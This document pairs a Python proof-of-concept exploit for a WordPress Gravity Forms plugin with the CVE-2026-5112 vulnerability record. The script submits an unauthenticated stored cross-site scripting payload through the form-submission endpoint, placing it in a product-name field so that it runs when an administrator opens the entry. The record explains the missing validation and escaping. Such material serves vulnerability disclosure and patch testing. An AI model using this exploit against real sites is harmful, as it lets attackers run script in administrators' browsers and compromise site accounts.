CVE-2026-5112

import requests # Exploit Title: WordPress Gravity Forms < 2.10.0 - Unauthenticated Stored XSS (PoC) # Description: Inject malicious script into the Product Name field of a Calculation Product field. target_url = "http://example.com/wp-admin/admin-ajax.php" # Replace with actual target # The payload attempts to execute JavaScript when an admin views the entry xss_payload = '"><img src=x onerror=alert(1)>' # Gravity Forms form submission data structure usually involves input_ID # Assuming field ID 1 is the Calculation Product field # .1 represents the product name, .3 represents the quantity form_data = { "action": "gform_submit", "form_id": "1", # Replace with a valid form ID "input_1.1": xss_payload, # Vulnerable Product Name field "input_1.3": "1", # Quantity field (validated, but harmless) "gform_submit": "1" } try: response = requests.post(target_url, data=form_data) if response.status_code == 200: print("[+] Payload submitted successfully.") print("[+] Check the entry details in the WordPress admin panel.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-5112", "sourceIdentifier": "[email protected]", "published": "2026-05-02T06:16:03.877", "lastModified": "2026-05-05T19:16:18.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Forms plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in versions up to and including 2.10.0. This is due to insufficient input validation and output escaping of Calculation Product field product names when rendered inside Repeater fields. The validate() method in the GF_Field_Calculation class only validates the quantity field (.3) and completely ignores the product name field (.1), allowing malicious HTML to pass through validation. When the value is saved, the sanitize_entry_value() method returns the raw value without sanitization for fields where HTML is not expected. Subsequently, when an entry is viewed in wp-admin, the get_value_entry_detail() method concatenates the unescaped product name directly into the output string, which is then rendered by the repeater's get_value_entry_detail() method without further escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via form submissions that will execute whenever an authenticated administrator with the gravityforms_view_entries capability accesses the entry detail page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.gravityforms.com/gravityforms-change-log/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/63973f61-81f0-4fc8-810c-a15734ff824e?source=cve", "source": "[email protected]"}]}}